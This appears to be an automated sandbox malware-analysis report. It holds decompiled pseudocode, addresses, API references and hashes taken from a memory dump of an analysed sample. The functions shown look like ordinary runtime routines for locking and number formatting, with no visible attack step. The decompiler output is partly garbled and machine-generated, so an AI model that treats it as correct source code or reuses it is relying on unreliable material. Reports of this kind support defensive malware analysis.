						 *((intOrPtr*)(_t267 + 0x10)) =  *((intOrPtr*)(_t267 + 0x10)) + 1;
						asm("adc dword [edi+0x14], 0x0");
						goto L25;
					}
				}
			}

0x00cea94c
0x00cea94f
0x00cea956
0x00cea95f
0x00cea963
0x00ceabcc
0x00cea969
0x00cea969
0x00cea969
0x00cea96b
0x00cea970
0x00ceae28
0x00ceae28
0x00ceae29
0x00000000
0x00cea976
0x00cea976
0x00cea97d
0x00cea981
0x00cea9b5
0x00cea9bc
0x00cea9be
0x00cea9c1
0x00cea9c1
0x00cea9c4
0x00cea9e0
0x00cea9e6
0x00cea9e9
0x00cea9e9
0x00cea983
0x00cea986
0x00cea9fb
0x00ceaa02
0x00ceaa04
0x00ceaa07
0x00ceaa07
0x00ceaa18
0x00ceaa26
0x00ceaa2c
0x00ceaa2f
0x00ceaa49
0x00cea988
0x00cea988
0x00cea98e
0x00cea996
0x00cea99f
0x00ceaa4d
0x00cea9a5
0x00cea9a5
0x00cea9a8
0x00cea9a8
0x00ceaa67
0x00ceaa67
0x00ceaa6f
0x00ceaa76
0x00ceaa78
0x00ceaa7b
0x00ceaa7b
0x00ceaa9a
0x00ceaaa0
0x00ceaaa3
0x00ceaabd
0x00ceaabd
0x00cea986
0x00ceaabf
0x00ceaac4
0x00ceaacc
0x00ceaad2
0x00ceaad6
0x00ceabdf
0x00ceabe5
0x00ceabe5
0x00ceabdf
0x00ceaae0
0x00ceaae4
0x00ceabbf
0x00ceabc4
0x00000000
0x00ceaaea
0x00ceaaea
0x00ceaaf9
0x00ceab02
0x00ceac31
0x00ceac32
0x00ceac33
0x00ceac38
0x00ceac3f
0x00ceab86
0x00ceab89
0x00ceab8f
0x00ceab96
0x00cead4f
0x00cead66
0x00ceab9c
0x00ceab9c
0x00ceab9c
0x00ceab9c
0x00ceab9f
0x00ceab9f
0x00ceaba8
0x00ceabfd
0x00ceac01
0x00ceac14
0x00ceac19
0x00ceac1e
0x00ceac1e
0x00ceabfd
0x00ceabaa
0x00ceabb0
0x00ceabbe
0x00ceabbe
0x00ceac45
0x00ceac45
0x00ceac5a
0x00ceac5a
0x00ceac5d
0x00ceac61
0x00ceac64
0x00ceac67
0x00ceac67
0x00ceac6b
0x00ceac73
0x00ceac77
0x00ceac77
0x00ceac7c
0x00ceac7e
0x00ceac82
0x00ceada0
0x00ceadb6
0x00ceadbb
0x00ceadc1
0x00ceae2b
0x00ceae2c
0x00ceae32
0x00000000
0x00ceae32
0x00ceadeb
0x00ceadf0
0x00000000
0x00ceac88
0x00ceac88
0x00ceac8d
0x00ceac91
0x00ceac95
0x00ceaccf
0x00ceacd1
0x00ceacd1
0x00ceacd5
0x00ceaceb
0x00ceacee
0x00ceacf7
0x00ceacfa
0x00cead00
0x00cead08
0x00cead0b
0x00cead12
0x00cead18
0x00cead1d
0x00000000
0x00cead1d
0x00ceac97
0x00ceaca4
0x00ceaca8
0x00ceacaa
0x00ceacae
0x00ceacb6
0x00ceadf9
0x00ceadf9
0x00ceadfd
0x00ceae03
0x00ceae11
0x00ceae16
0x00ceae17
0x00ceae23
0x00000000
0x00ceae23
0x00ceacbe
0x00ceacc4
0x00000000
0x00000000
0x00ceacca
0x00000000
0x00ceacca
0x00ceac82
0x00ceab08
0x00ceab0c
0x00ceab10
0x00ceab13
0x00ceab1a
0x00ceac4a
0x00ceac4e
0x00ceac52
0x00ceac56
0x00000000
0x00ceac56
0x00ceab20
0x00ceab26
0x00ceab2a
0x00cead26
0x00cead2a
0x00cead2e
0x00cead32
0x00cead39
0x00cead3e
0x00cead44
0x00ceab38
0x00ceab38
0x00ceab3d
0x00ceab3f
0x00ceab43
0x00ceab5a
0x00ceab5c
0x00ceab5c
0x00ceab60
0x00ceab64
0x00ceab6d
0x00ceab6f
0x00ceab73
0x00ceab75
0x00ceab7a
0x00ceab80
0x00000000
0x00000000
0x00000000
0x00ceab80
0x00ceab45
0x00ceab47
0x00ceab4f
0x00cead73
0x00cead77
0x00cead7d
0x00cead8b
0x00cead90
0x00cead91
0x00cead9b
0x00000000
0x00cead9b
0x00ceab55
0x00000000
0x00ceab55
0x00000000
0x00cead4a
0x00ceab30
0x00ceab34
0x00000000
0x00ceab34
0x00ceaae4

APIs

TryAcquireSRWLockExclusive.KERNEL32(00000040), ref: 00CEAC6B
ReleaseSRWLockExclusive.KERNEL32(00000040), ref: 00CEAD12
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00CE9725,00000000,00000000,?,00CE85AB,00000068,00CE9725,?,?,00CD7B8F), ref: 00CEAE2C

Strings

first, xrefs: 00CEAD86, 00CEAE0C

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire
String ID: first
API String ID: 1021914862-2456940119
Opcode ID: 4d897c87e440f6efe5053bffbf5fd088db493346955ad6b8e78f92be9b8126cf
Instruction ID: 5d18c18b17ede8cd73d6b4a09862592909f61a757679030efde54285ca2ef8c1
Opcode Fuzzy Hash: 4d897c87e440f6efe5053bffbf5fd088db493346955ad6b8e78f92be9b8126cf
Instruction Fuzzy Hash: 11D133726047818FC3188F2AC89077AB7E2FF84314F19866DE8568B785D735EA05DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00D17AE0 Relevance: 6.3, APIs: 4, Instructions: 337
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00D17AE0(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed char _t87;
				void* _t93;
				intOrPtr _t94;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t111;
				void* _t113;
				signed int _t114;
				void* _t115;
				void* _t118;
				void* _t120;
				void* _t122;
				signed int* _t124;
				void* _t127;
				signed int _t129;
				signed int _t131;
				signed int _t136;
				signed int* _t140;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				void* _t161;
				unsigned int _t162;
				intOrPtr _t171;
				signed int _t173;
				signed int* _t174;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				intOrPtr _t189;
				void* _t190;

				_t186 = _a24;
				if(_t186 < 0) {
					_t186 = 0;
				}
				_t183 = _a8;
				_t3 = _t186 + 0xb; // 0xb
				 *_t183 = 0;
				if(_a12 > _t3) {
					_t140 = _a4;
					_t147 = _t140[1];
					_t173 =  *_t140;
					__eflags = (_t147 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if(__eflags != 0) {
						__eflags = _t147;
						if(__eflags > 0) {
							L13:
							_t174 = _t183 + 1;
							_t87 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t87;
							_v16 = _t174;
							_v48 = ((_t87 & 0x000000ff) << 5) + 7;
							__eflags = _t147 & 0x7ff00000;
							_t93 = 0x30;
							if((_t147 & 0x7ff00000) != 0) {
								 *_t183 = 0x31;
								L18:
								_t149 = 0;
								__eflags = 0;
								L19:
								_t184 =  &(_t174[0]);
								__eflags = _t186;
								if(_t186 != 0) {
									_t94 = _a40;
									__eflags =  *((char*)(_t94 + 0x14));
									if(__eflags == 0) {
										E00D024A0(_t94, __eflags);
										_t94 = _a40;
										_t174 = _v16;
									}
									_t149 = 0;
									__eflags = 0;
									_t98 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)) + 0x88))))));
								} else {
									_t98 = _t149;
								}
								 *_t174 = _t98;
								_t100 = _t140[1] & 0x000fffff;
								__eflags = _t100;
								_v40 = _t100;
								if(_t100 > 0) {
									L26:
									_t175 = _t149;
									_t150 = 0xf0000;
									_t101 = 0x30;
									_v12 = _t101;
									_v24 = _t149;
									_v28 = 0xf0000;
									while(1) {
										_v32 = _v12 & 0x0000ffff;
										_t104 = _t184;
										_v36 = _t184;
										_v40 = _t186;
										__eflags = _t186;
										if(__eflags <= 0) {
											break;
										}
										_t127 = E00D183F0( *_t140 & _t175, _v32 & 0x0000ffff, _t140[1] & _t150 & 0x000fffff);
										_t161 = 0x30;
										_t129 = _t127 + _t161 & 0x0000ffff;
										__eflags = _t129 - 0x39;
										if(_t129 > 0x39) {
											_t129 = _t129 + _v48;
											__eflags = _t129;
										}
										_t162 = _v28;
										_t175 = (_t162 << 0x00000020 | _v24) >> 4;
										 *_t184 = _t129;
										_t184 = _t184 + 1;
										_t150 = _t162 >> 4;
										_t131 = _v12 - 4;
										_t186 = _t186 - 1;
										_v24 = (_t162 << 0x00000020 | _v24) >> 4;
										_v28 = _t162 >> 4;
										_v12 = _t131;
										__eflags = _t131;
										if(_t131 >= 0) {
											continue;
										} else {
											goto L43;
										}
									}
									_t186 = _v40;
									_t184 = _t104;
									_t105 = E00D17A4D(__eflags, _t140, _t175, _t150, _v32, _a36);
									_t190 = _t190 + 0x14;
									__eflags = _t105;
									if(_t105 == 0) {
										goto L43;
									}
									_t184 = _v36;
									_t146 = 0x30;
									_t124 = _t184 - 1;
									while(1) {
										_t156 =  *_t124;
										__eflags = _t156 - 0x66;
										if(_t156 == 0x66) {
											goto L36;
										}
										__eflags = _t156 - 0x46;
										if(_t156 != 0x46) {
											_t140 = _a4;
											__eflags = _t124 - _v16;
											if(_t124 == _v16) {
												_t65 = _t124 - 1;
												 *_t65 =  *(_t124 - 1) + 1;
												__eflags =  *_t65;
											} else {
												__eflags = _t156 - 0x39;
												if(_t156 != 0x39) {
													_t157 = _t156 + 1;
													__eflags = _t157;
												} else {
													_t157 = _v48 + 0x3a;
												}
												 *_t124 = _t157;
											}
											goto L43;
										}
										L36:
										 *_t124 = _t146;
										_t124 = _t124 - 1;
									}
								} else {
									__eflags =  *_t140 - _t149;
									if( *_t140 <= _t149) {
										L43:
										__eflags = _t186;
										if(_t186 > 0) {
											_push(_t186);
											_t122 = 0x30;
											_push(_t122);
											_push(_t184);
											E00D011A0(_t184);
											_t184 = _t184 + _t186;
											__eflags = _t184;
										}
										_t106 = _v16;
										__eflags =  *_t106;
										if( *_t106 == 0) {
											_t184 = _t106;
										}
										 *_t184 = (_v5 << 5) + 0x50;
										_t176 = _t140[1];
										_t111 = E00D183F0( *_t140, 0x34, _t176);
										_t141 = 0;
										_t188 = _t176 & 0;
										_t177 = _t184 + 2;
										_t154 = (_t111 & 0x000007ff) - _v20;
										__eflags = _t154;
										_v48 = _t177;
										asm("sbb esi, ebx");
										if(__eflags < 0) {
											L51:
											_t154 =  ~_t154;
											asm("adc esi, ebx");
											_t188 =  ~_t188;
											0x2b = 0x2d;
											goto L52;
										} else {
											if(__eflags > 0) {
												L50:
												L52:
												 *(_t184 + 1) = 0x2b;
												_t185 = _t177;
												_t113 = 0x30;
												 *_t177 = _t113;
												__eflags = _t188 - _t141;
												if(__eflags < 0) {
													L61:
													_t178 = 0x30;
													L62:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														L66:
														_t155 = _t154 + _t178;
														__eflags = _t155;
														 *_t185 = _t155;
														 *(_t185 + 1) = _t141;
														L67:
														_t114 = 0;
														__eflags = 0;
														L68:
														return _t114;
													}
													if(__eflags > 0) {
														L65:
														_push(_t141);
														_push(_t141);
														_push(0xa);
														_push(_t188);
														_push(_t154);
														_t115 = E00D1E4B0();
														_v48 = _t178;
														_t178 = 0x30;
														 *_t185 = _t115 + _t178;
														_t185 = _t185 + 1;
														_t141 = 0;
														__eflags = 0;
														goto L66;
													}
													__eflags = _t154 - 0xa;
													if(_t154 < 0xa) {
														goto L66;
													}
													goto L65;
												}
												if(__eflags > 0) {
													L55:
													_push(_t141);
													_push(_t141);
													_push(0x3e8);
													_push(_t188);
													_push(_t154);
													_t118 = E00D1E4B0();
													_t188 = _t141;
													_v40 = _t177;
													_t177 = _v48;
													_t141 = 0;
													_t185 = _t177 + 1;
													 *_t177 = _t118 + 0x30;
													__eflags = _t185 - _t177;
													if(_t185 != _t177) {
														L59:
														_push(_t141);
														_push(_t141);
														_push(0x64);
														_push(_t188);
														_push(_t154);
														_t120 = E00D1E4B0();
														_t188 = _t141;
														_v40 = _t177;
														_t141 = 0;
														_t178 = 0x30;
														 *_t185 = _t120 + _t178;
														_t185 = _t185 + 1;
														__eflags = _t185 - _v48;
														if(_t185 != _v48) {
															goto L65;
														}
														goto L62;
													}
													L56:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														goto L61;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t154 - 0x64;
													if(_t154 < 0x64) {
														goto L61;
													}
													goto L59;
												}
												__eflags = _t154 - 0x3e8;
												if(_t154 < 0x3e8) {
													goto L56;
												}
												goto L55;
											}
											__eflags = _t154;
											if(_t154 < 0) {
												goto L51;
											}
											goto L50;
										}
									}
									goto L26;
								}
							}
							 *_t183 = _t93;
							_t149 =  *_t140 | _t140[1] & 0x000fffff;
							__eflags = _t149;
							if(_t149 != 0) {
								_v20 = 0x3fe;
								goto L18;
							}
							_v20 = _t149;
							goto L19;
						}
						if(__eflags < 0) {
							L12:
							 *_t183 = 0x2d;
							_t183 = _t183 + 1;
							__eflags = _t183;
							_t147 = _t140[1];
							goto L13;
						}
						__eflags = _t173;
						if(_t173 >= 0) {
							goto L13;
						}
						goto L12;
					}
					_t114 = L00D17906(_t140, _t147, _t173, __eflags, _t140, _t183, _a12, _a16, _a20, _t186, 0, _a32, _a36, _a40);
					__eflags = _t114;
					if(_t114 == 0) {
						_t136 = E00D01430(_t183, 0x65);
						__eflags = _t136;
						if(_t136 != 0) {
							 *_t136 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							 *((char*)(_t136 + 3)) = 0;
						}
						goto L67;
					}
					 *_t183 = 0;
					goto L68;
				}
				_t171 = _a40;
				_t189 = 0x22;
				 *((char*)(_t171 + 0x1c)) = 1;
				 *((intOrPtr*)(_t171 + 0x18)) = _t189;
				E00D17228(_t183, 0, 0, 0, 0, 0, _t171);
				return _t189;
			}

0x00d17aeb
0x00d17af1
0x00d17af3
0x00d17af3
0x00d17af5
0x00d17af8
0x00d17afb
0x00d17b00
0x00d17b25
0x00d17b28
0x00d17b2d
0x00d17b37
0x00d17b3c
0x00d17b95
0x00d17b97
0x00d17ba6
0x00d17ba9
0x00d17bac
0x00d17bae
0x00d17bb5
0x00d17bc7
0x00d17bca
0x00d17bcf
0x00d17bd3
0x00d17bd4
0x00d17bf4
0x00d17bf7
0x00d17bf7
0x00d17bf7
0x00d17bf9
0x00d17bf9
0x00d17bfc
0x00d17bfe
0x00d17c04
0x00d17c07
0x00d17c0b
0x00d17c0f
0x00d17c14
0x00d17c17
0x00d17c17
0x00d17c1d
0x00d17c1d
0x00d17c27
0x00d17c00
0x00d17c00
0x00d17c00
0x00d17c29
0x00d17c2e
0x00d17c2e
0x00d17c33
0x00d17c36
0x00d17c40
0x00d17c42
0x00d17c44
0x00d17c49
0x00d17c4a
0x00d17c4d
0x00d17c50
0x00d17c53
0x00d17c59
0x00d17c5c
0x00d17c5e
0x00d17c61
0x00d17c64
0x00d17c66
0x00000000
0x00000000
0x00d17c7d
0x00d17c84
0x00d17c88
0x00d17c8b
0x00d17c8e
0x00d17c90
0x00d17c90
0x00d17c90
0x00d17c96
0x00d17c99
0x00d17c9d
0x00d17c9f
0x00d17ca3
0x00d17ca6
0x00d17ca9
0x00d17caa
0x00d17cad
0x00d17cb0
0x00d17cb3
0x00d17cb6
0x00000000
0x00d17cb8
0x00000000
0x00d17cb8
0x00d17cb6
0x00d17cbd
0x00d17cc0
0x00d17cc8
0x00d17ccd
0x00d17cd0
0x00d17cd2
0x00000000
0x00000000
0x00d17cd4
0x00d17cd9
0x00d17cda
0x00d17cdd
0x00d17cdd
0x00d17cdf
0x00d17ce2
0x00000000
0x00000000
0x00d17ce4
0x00d17ce7
0x00d17cee
0x00d17cf1
0x00d17cf4
0x00d17d09
0x00d17d09
0x00d17d09
0x00d17cf6
0x00d17cf6
0x00d17cf9
0x00d17d03
0x00d17d03
0x00d17cfb
0x00d17cfe
0x00d17cfe
0x00d17d05
0x00d17d05
0x00000000
0x00d17cf4
0x00d17ce9
0x00d17ce9
0x00d17ceb
0x00d17ceb
0x00d17c38
0x00d17c38
0x00d17c3a
0x00d17d0c
0x00d17d0c
0x00d17d0e
0x00d17d10
0x00d17d13
0x00d17d14
0x00d17d15
0x00d17d16
0x00d17d1e
0x00d17d1e
0x00d17d1e
0x00d17d20
0x00d17d23
0x00d17d26
0x00d17d28
0x00d17d28
0x00d17d34
0x00d17d38
0x00d17d3b
0x00d17d40
0x00d17d4c
0x00d17d4e
0x00d17d51
0x00d17d51
0x00d17d54
0x00d17d57
0x00d17d59
0x00d17d65
0x00d17d65
0x00d17d69
0x00d17d6b
0x00d17d6d
0x00000000
0x00d17d5b
0x00d17d5b
0x00d17d61
0x00d17d6e
0x00d17d6e
0x00d17d71
0x00d17d75
0x00d17d76
0x00d17d78
0x00d17d7a
0x00d17dd6
0x00d17dd8
0x00d17dd9
0x00d17dd9
0x00d17ddb
0x00d17dfe
0x00d17dfe
0x00d17dfe
0x00d17e00
0x00d17e02
0x00d17e05
0x00d17e05
0x00d17e05
0x00d17e07
0x00000000
0x00d17e07
0x00d17ddd
0x00d17de4
0x00d17de4
0x00d17de5
0x00d17de6
0x00d17de8
0x00d17de9
0x00d17dea
0x00d17df3
0x00d17df6
0x00d17df9
0x00d17dfb
0x00d17dfc
0x00d17dfc
0x00000000
0x00d17dfc
0x00d17ddf
0x00d17de2
0x00000000
0x00000000
0x00000000
0x00d17de2
0x00d17d81
0x00d17d87
0x00d17d87
0x00d17d88
0x00d17d89
0x00d17d8a
0x00d17d8b
0x00d17d8c
0x00d17d91
0x00d17d95
0x00d17d9a
0x00d17d9d
0x00d17d9f
0x00d17da2
0x00d17da4
0x00d17da6
0x00d17db3
0x00d17db3
0x00d17db4
0x00d17db5
0x00d17db7
0x00d17db8
0x00d17db9
0x00d17dbe
0x00d17dc4
0x00d17dc7
0x00d17dc9
0x00d17dcc
0x00d17dce
0x00d17dcf
0x00d17dd2
0x00000000
0x00000000
0x00000000
0x00d17dd4
0x00d17da8
0x00d17da8
0x00d17daa
0x00000000
0x00000000
0x00d17dac
0x00000000
0x00000000
0x00d17dae
0x00d17db1
0x00000000
0x00000000
0x00000000
0x00d17db1
0x00d17d83
0x00d17d85
0x00000000
0x00000000
0x00000000
0x00d17d85
0x00d17d5d
0x00d17d5f
0x00000000
0x00000000
0x00000000
0x00d17d5f
0x00d17d59
0x00000000
0x00d17c3a
0x00d17c36
0x00d17bd6
0x00d17be2
0x00d17be2
0x00d17be4
0x00d17beb
0x00000000
0x00d17beb
0x00d17be6
0x00000000
0x00d17be6
0x00d17b99
0x00d17b9f
0x00d17b9f
0x00d17ba2
0x00d17ba2
0x00d17ba3
0x00000000
0x00d17ba3
0x00d17b9b
0x00d17b9d
0x00000000
0x00000000
0x00000000
0x00d17b9d
0x00d17b56
0x00d17b5e
0x00d17b60
0x00d17b6d
0x00d17b74
0x00d17b76
0x00d17b88
0x00d17b8a
0x00d17b8a
0x00000000
0x00d17b76
0x00d17b62
0x00000000
0x00d17b62
0x00d17b02
0x00d17b07
0x00d17b0e
0x00d17b12
0x00d17b15
0x00000000

APIs

_strrchr.LIBCMT ref: 00D17B6D

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 3153965dcaf69f367fd7a5141650f001fcf00ff4fc1686d2e9c05b0866f307f3
Instruction ID: 50e7cc14b0e06df0e53343ae980ce7c9297724a792e24413b7342bd5ab37f319
Opcode Fuzzy Hash: 3153965dcaf69f367fd7a5141650f001fcf00ff4fc1686d2e9c05b0866f307f3
Instruction Fuzzy Hash: 18B13B72908245AFDB158F68E881BFEBBF5EF55310F188166E405AB351DA34DD81C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA880 Relevance: 6.3, Strings: 4, Instructions: 1303
COMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E00CAA880(void* __ebx, void* __edi, void* __esi, void* __fp0, signed int _a4, intOrPtr* _a8, signed char _a12, intOrPtr _a16, unsigned int _a20, signed char* _a24, signed int _a28, signed int* _a32, signed int _a36, signed int _a40, char _a44) {
				void* _v16;
				char _v560;
				void* __ebp;
				intOrPtr* _t567;
				intOrPtr* _t576;
				intOrPtr* _t577;
				signed int _t585;
				signed int _t586;
				intOrPtr _t599;
				signed short* _t602;
				intOrPtr _t606;
				void* _t608;
				signed int _t610;
				intOrPtr _t612;
				signed short* _t618;
				signed int _t621;
				signed int _t622;
				signed int _t624;
				signed short* _t647;
				signed int _t650;
				signed short* _t652;
				signed int _t655;
				signed char _t658;
				signed int _t659;
				signed int _t663;
				signed int _t666;
				intOrPtr* _t674;
				signed int _t676;
				signed int _t678;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				intOrPtr* _t713;
				signed int _t717;
				char _t718;
				signed int _t719;
				intOrPtr _t720;
				intOrPtr* _t722;
				signed int _t723;
				signed int _t725;
				signed int _t729;
				signed int* _t731;
				intOrPtr* _t732;
				signed int _t733;
				signed int _t734;
				intOrPtr* _t735;
				intOrPtr _t746;
				char* _t748;
				char* _t749;
				intOrPtr _t750;
				signed int _t753;
				intOrPtr _t755;
				void* _t758;
				void* _t762;
				void* _t768;

				_t768 = __fp0;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t755 = (_t753 & 0xfffffff8) - 0x230;
				_t746 = _t755;
				 *((intOrPtr*)(_t746 + 0x218)) = _t750;
				_t567 = _t746 + 0x220;
				 *((intOrPtr*)(_t567 - 4)) = _t755;
				 *(_t567 + 8) = 0xffffffff;
				 *((intOrPtr*)(_t567 + 4)) = 0xcb3cd0;
				 *_t567 =  *[fs:0x0];
				_t722 = _a8;
				 *[fs:0x0] = _t567;
				_t658 = E00CB39FA(_t567, _a4);
				if(_t722 == 0) {
					_t723 = 0;
					__eflags = _t658;
					if(_t658 != 0) {
						goto L245;
					} else {
						goto L4;
					}
				} else {
					_t652 =  *(_t722 + 0xc);
					if(_t652 ==  *((intOrPtr*)(_t722 + 0x10))) {
						 *0xd57000();
						_t655 =  *((intOrPtr*)( *((intOrPtr*)( *_t722 + 0x20))))();
						_t722 = _a8;
					} else {
						_t655 =  *_t652 & 0x0000ffff;
					}
					_t723 =  ==  ? 0 : _t722;
					if((_t658 ^ (_t655 & 0xffffff00 | _t655 == 0x0000ffff)) != 0) {
						L4:
						 *(_t746 + 4) = _t723;
						_t725 = _t746 + 0x88;
						E00D011A0(_t725, _t725, 0xff, 0x190);
						 *(_t746 + 0x58) = _t725;
						 *((intOrPtr*)(_t746 + 0x5c)) = E00C90790;
						 *(_t746 + 0x24) = _t725;
						 *((intOrPtr*)(_t746 + 0x6c)) = _t725 + 0x190;
						 *((intOrPtr*)(_t746 + 0x68)) = 0xffffffffffffffff;
						 *((short*)(_t746 + 0x62)) = 0xffffffffffffffff;
						 *((short*)(_t746 + 0x60)) = 0xffffffffffffffff;
						 *((intOrPtr*)(_t746 + 0x64)) = 0xffffffffffffffff;
						_t576 = _t746 + 0x70;
						 *((intOrPtr*)(_t576 + 4)) = 0;
						 *_t576 = 0;
						 *((intOrPtr*)(_t576 + 8)) = 0;
						_t713 = _t746 + 0x18;
						 *((intOrPtr*)(_t713 + 4)) = 0;
						 *_t713 = 0;
						 *((intOrPtr*)(_t713 + 8)) = 0;
						_t674 = _t746 + 0x48;
						 *((intOrPtr*)(_t674 + 4)) = 0;
						 *_t674 = 0;
						 *((intOrPtr*)(_t674 + 8)) = 0;
						_t577 = _t746 + 0x28;
						 *((intOrPtr*)(_t577 + 4)) = 0;
						 *_t577 = 0;
						 *((intOrPtr*)(_t577 + 8)) = 0;
						 *((intOrPtr*)(_t746 + 0x3c)) = 0;
						 *((intOrPtr*)(_t746 + 0x38)) = 0;
						 *((intOrPtr*)(_t746 + 0x40)) = 0;
						 *(_t746 + 0x228) = 2;
						L00CABF42(_t713, _a12 & 0x000000ff, _a16, _t746 + 0x68, _t746 + 0x62, _t746 + 0x60, _t746 + 0x70, _t713, _t674, _t577, _t746 + 0x64);
						_t758 = _t755 + 0x34;
						 *_a40 =  *_a36;
						 *(_t746 + 0x80) = _a20 >> 0x00000009 & 0x00000001;
						_t585 = 0;
						_t717 = 0;
						__eflags = 0;
						_t729 =  *(_t746 + 4);
						while(1) {
							L5:
							 *(_t746 + 4) = _t729;
							 *(_t746 + 0xc) = _t585;
							__eflags = _t717 - 3;
							if(_t717 > 3) {
								break;
							}
							 *((intOrPtr*)(_t746 + 0x10)) = _t717;
							 *(_t746 + 0x228) = 2;
							_t719 = E00CB39FA(_t585, _a4);
							_t666 =  *(_t746 + 4);
							__eflags = _t666;
							if(_t666 == 0) {
								 *(_t746 + 4) = 0;
								_t663 = 0;
								__eflags = _t719;
								_t720 =  *((intOrPtr*)(_t746 + 0x10));
								if(_t719 == 0) {
									goto L13;
								} else {
									goto L247;
								}
							} else {
								_t647 =  *(_t666 + 0xc);
								__eflags = _t647 -  *((intOrPtr*)(_t666 + 0x10));
								if(_t647 ==  *((intOrPtr*)(_t666 + 0x10))) {
									 *(_t746 + 0x228) = 0xffffffff;
									 *(_t746 + 8) = _t719;
									 *0xd57000();
									 *(_t746 + 0x228) = 2;
									_t650 =  *((intOrPtr*)( *((intOrPtr*)( *_t666 + 0x20))))();
									_t719 =  *(_t746 + 8);
									_t666 =  *(_t746 + 4);
								} else {
									_t650 =  *_t647 & 0x0000ffff;
								}
								__eflags = _t650 - 0xffff;
								_t663 =  ==  ? 0 : _t666;
								 *(_t746 + 4) = _t663;
								__eflags = _t719 - (_t650 & 0xffffff00 | _t650 == 0x0000ffff);
								_t720 =  *((intOrPtr*)(_t746 + 0x10));
								if(_t719 == (_t650 & 0xffffff00 | _t650 == 0x0000ffff)) {
									L247:
									 *(_t746 + 4) = _t663;
									__eflags =  *(_t746 + 0xc);
									if( *(_t746 + 0xc) == 0) {
										L275:
										_t586 =  *(_t746 + 0x58);
										_t676 =  *(_t746 + 0x24);
										_t659 = 1;
										__eflags = _t586 - _t676;
										if(_t586 != _t676) {
											_t731 = _t746 + 0x84;
											 *_t731 = 0;
											E00CAA3B4(_t746 + 0x70, _t746 + 0x70, _t586, _t676, _t731);
											_t758 = _t758 + 0x10;
											__eflags =  *_t731;
											if( *_t731 != 0) {
												goto L277;
											}
										}
										goto L278;
									} else {
										__eflags = 1;
										 *(_t746 + 8) = 1;
										while(1) {
											_t678 =  *(_t746 + 0xc);
											__eflags =  *((char*)(_t678 + 0xb));
											if( *((char*)(_t678 + 0xb)) < 0) {
												_t599 =  *((intOrPtr*)(_t678 + 4));
											} else {
												_t599 = L00C91E10(_t678, _t768);
											}
											__eflags =  *(_t746 + 8) - _t599;
											if( *(_t746 + 8) >= _t599) {
												goto L275;
											}
											 *(_t746 + 0x228) = 2;
											_t718 = E00CB39FA(_t599, _a4);
											_t664 =  *(_t746 + 4);
											__eflags = _t664;
											if(_t664 == 0) {
												 *(_t746 + 4) = 0;
												__eflags = _t718;
												if(_t718 == 0) {
													goto L262;
												} else {
													goto L277;
												}
											} else {
												_t618 =  *(_t664 + 0xc);
												__eflags = _t618 -  *((intOrPtr*)(_t664 + 0x10));
												if(_t618 ==  *((intOrPtr*)(_t664 + 0x10))) {
													 *(_t746 + 0x228) = 0xffffffff;
